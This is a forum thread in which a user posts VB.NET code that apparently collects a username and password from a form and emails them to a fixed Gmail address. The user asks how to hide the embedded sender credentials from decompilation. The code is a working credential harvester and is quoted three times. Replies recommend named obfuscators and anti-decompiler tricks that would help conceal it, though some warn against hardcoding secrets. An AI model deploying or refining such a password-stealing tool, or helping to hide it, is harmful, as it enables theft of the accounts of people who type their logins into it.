HelpEmail sending program

Posts 1–11 of 11 · Page 1 of 1
Email sending program
Code:
Imports System.Net.Mail

Public Class Form1

    Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load



    End Sub
    Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
        If TextBox1.Text = "" Then
            MsgBox("Username Is Missing")
            If TextBox2.Text = "" Then
                MsgBox("Password Is Missing")
            Else
            End If
        End If
        Dim smtpServer As New SmtpClient()
        Dim mail As New MailMessage()
        smtpServer.Credentials = New Net.NetworkCredential("minuoma12345@gmail.com", "xxxxxxxx")
        'using gmail
        smtpServer.Port = 587
        smtpServer.Host = "smtp.gmail.com"
        smtpServer.EnableSsl = True
        mail = New MailMessage()
        mail.From = New MailAddress("minuoma12345@gmail.com")
        mail.To.Add("orav1998@gmail.com")
        mail.Subject = "Username: " & TextBox1.Text
        mail.Body = "Username : " & TextBox2.Text & ", " & "Password : " & TextBox1.Text
        smtpServer.Send(mail)
        Me.Show()
    End Sub
End Class
Can anyone help me make it safer cause i just found out how easy is it to decompile this thing....
a42091c46658c23999506e9395e0c3a5.png
Quote Originally Posted by zarix View Post
Code:
Imports System.Net.Mail

Public Class Form1

    Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load



    End Sub
    Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
        If TextBox1.Text = "" Then
            MsgBox("Username Is Missing")
            If TextBox2.Text = "" Then
                MsgBox("Password Is Missing")
            Else
            End If
        End If
        Dim smtpServer As New SmtpClient()
        Dim mail As New MailMessage()
        smtpServer.Credentials = New Net.NetworkCredential("minuoma12345@gmail.com", "xxxxxxxx")
        'using gmail
        smtpServer.Port = 587
        smtpServer.Host = "smtp.gmail.com"
        smtpServer.EnableSsl = True
        mail = New MailMessage()
        mail.From = New MailAddress("minuoma12345@gmail.com")
        mail.To.Add("orav1998@gmail.com")
        mail.Subject = "Username: " & TextBox1.Text
        mail.Body = "Username : " & TextBox2.Text & ", " & "Password : " & TextBox1.Text
        smtpServer.Send(mail)
        Me.Show()
    End Sub
End Class
Can anyone help me make it safer cause i just found out how easy is it to decompile this thing....
a42091c46658c23999506e9395e0c3a5.png
This should help you out.
Quote Originally Posted by zarix View Post
Code:
Imports System.Net.Mail

Public Class Form1

    Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load



    End Sub
    Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
        If TextBox1.Text = "" Then
            MsgBox("Username Is Missing")
            If TextBox2.Text = "" Then
                MsgBox("Password Is Missing")
            Else
            End If
        End If
        Dim smtpServer As New SmtpClient()
        Dim mail As New MailMessage()
        smtpServer.Credentials = New Net.NetworkCredential("minuoma12345@gmail.com", "xxxxxxxx")
        'using gmail
        smtpServer.Port = 587
        smtpServer.Host = "smtp.gmail.com"
        smtpServer.EnableSsl = True
        mail = New MailMessage()
        mail.From = New MailAddress("minuoma12345@gmail.com")
        mail.To.Add("orav1998@gmail.com")
        mail.Subject = "Username: " & TextBox1.Text
        mail.Body = "Username : " & TextBox2.Text & ", " & "Password : " & TextBox1.Text
        smtpServer.Send(mail)
        Me.Show()
    End Sub
End Class
Can anyone help me make it safer cause i just found out how easy is it to decompile this thing....
a42091c46658c23999506e9395e0c3a5.pngⓘ
I don't see why anyone would want to decompile it.
If someone is at the stage of decompiling projects they're already past SMPT, so there really isn't much of a point.
But, my favourite obfuscator is probably Confuser and can be found at: Confuser - Homeⓘ
Woah, woah woah. People are suggesting obfuscators to help hide the credentials listed in the source code, I would not suggest this. Aside from simple sniffing, most of the time obfuscated applications can be deobfuscated easily. The safest method to send emails from an application would be to contact an online php script to send the email (do this by signing up for a free web hosting account somewhere, and copy pasting an email script with GET or even POST variables). If you can't be bothered to do that, I would suggest that you have users insert their own credentials on run time.

What are you attempting to build as a whole of your application? It's possible that you are going the wrong way using SMTP in your app (as there are few instances it should be needed).
Estonia
Äge et siin eestlasi ka on
Rustemsoft's Skater Obfuscator (Free Version available)
Obfuscation is pointless for something like this. There are plenty of ways to get the login information after its loaded.
And string obfuscation is entirely simple to defeat.

As mentioned earlier, your best bet is to not rely on your application to actually send the email and use a remote script that your application communicates with in some manner.
.Net reactor can be decompiled, I did that like over 50 times. Use some obfuscators that has anti opening future in decompilers.
Ex. if you open the obfuscated program you will see an error saying not a valid assembly even if it is .net
Quote Originally Posted by lokpi View Post
.Net reactor can be decompiled, I did that like over 50 times. Use some obfuscators that has anti opening future in decompilers.
Ex. if you open the obfuscated program you will see an error saying not a valid assembly even if it is .net
And tricks like this are easily fixed / removed. The best route to take is not hard coding sensitive data into your application.
Protip: storing secret or important information/credentials within a program is a terrible idea, no matter the instance.
Posts 1–11 of 11 · Page 1 of 1

Post a Reply

Similar Threads

Tags for this Thread

None

Talk with us